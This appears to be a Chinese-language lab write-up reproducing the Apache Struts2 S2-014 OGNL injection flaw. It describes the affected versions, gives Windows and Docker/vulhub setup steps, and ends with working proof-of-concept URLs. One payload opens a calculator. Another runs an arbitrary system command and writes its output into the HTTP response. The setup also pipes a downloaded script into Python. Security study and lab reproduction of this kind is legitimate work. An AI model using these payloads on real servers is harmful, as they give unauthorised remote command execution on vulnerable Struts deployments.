struts-s2-014

此文仅供大家交流学习，严禁非法使用

一、参考网址：

http://struts.apache.org/docs/s2-014.html
https://github.com/phith0n/vulhub/tree/master/struts2/s2-013

二、 影响版本：

S2-014 是对 S2-013 修复的加强，在 S2-013 修复的代码中忽略了 ${ognl_exp} OGNL 表达式执行的方式，因此 S2-014 是对其的补丁加强。

三、 漏洞介绍：

无论是S：URL和S：一个标签提供includeParams属性。
该属性的主要范围是了解是否包括http请求参数。
includeParams的允许值为：
无 - 在URL中不包含参数（默认）
get - 仅在URL中包含GET参数
all - 在URL中包含GET和POST参数
包含特制请求参数的请求可用于将任意OGNL代码注入到堆栈中，之后用作URL或A标签的请求参数，这将进一步评估。
当URL / A标签尝试解析原始请求中存在的每个参数时，会发生第二个评估。
这使得恶意用户将任意的OGNL语句放入任何请求参数（不一定由代码管理），并将其评估为OGNL表达式，以启用方法执行并执行任意方法，绕过Struts和OGNL库保护。
这个问题最初由Struts 2.3.14.1和安全公告S2-013处理。然而，2.3.14.1引入的解决方案没有解决所有可能的攻击向量，因此2.3.14.2之前的每个版本的Struts 2仍然容易受到这种攻击。

此漏洞相对于S2-013来说，前者参数必须为后台代码指定参数，但后者为任意参数，大大增强了漏洞被攻破的可能性

四、 环境搭建：

（windows）

• 下载/struts/2.1.6

下载地址：http://archive.apache.org/dist/struts/binaries/struts-2.1.6-apps.zip

• 下载安装xampp

• 部署showcase

• 解压

2.1.6_1.png
2.1.6_2.png

• 复制到.

2.1.6_3.png

• 重启tomcat

2.1.6_4.png

• 已成功自动部署

2.1.6_5.png

• 修改配置
  在Struts Blank应用程序中打开HelloWorld.jsp，并将以下参数添加到url / a标签之一：
  includeParams="all"
  这样一来，这条线将会是这样的：
  <s:url id="url" action="HelloWorld" includeParams="all">
  运行struts2-blank应用程序

环境搭建：（ubuntu）

curl -s https://bootstrap.pypa.io/get-pip.py | python3

• 安装docker
  apt-get update && apt-get install docker.io

• 启动docker服务
  service docker start

• 安装compose
  pip install docker-compose

注意要先ssh连接，将公钥添加到github上，具体参照网上教程

• 拉取项目
  git clone git@github.com:phith0n/vulhub.git
  cd vulhub

• 进入某一个漏洞/环境的目录
  cd nginx_php5_mysql

• 自动化编译环境
  docker-compose build

• 启动整个环境
  docker-compose up -d

五、 POC:

aaa=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}

六、 测试网址：

原始网址:

http://ip:8080/struts2-blank-2.1.6/example/HelloWorld.action

修改后网址;

http://ip:8080/struts2-blank-2.1.6/example/HelloWorld.action?url=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}

执行结果为打开本地计算器应用

任意可执行命令POC:

aaaa=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23cmd="ipconfig",%23ret=@java.lang.Runtime@getRuntime().exec(%23cmd),%23data=new+java.io.DataInputStream(%23ret.getInputStream()),%23res=new+byte[500],%23data.readFully(%23res),%23echo=new+java.lang.String(%23res),%23out=@org.apache.struts2.ServletActionContext@getResponse(),%23out.getWriter().println(%23echo)%7D

七、执行结果

1.png

注意根据需求更改res大小

八、 至此，该漏洞基本利用完毕

本人还是一个未毕业的小萌新，希望大家多多帮助，有问题请发送邮件到xrzsupupup@163.com不胜感激，我也会尽量去帮助大家

坚决做一名白帽子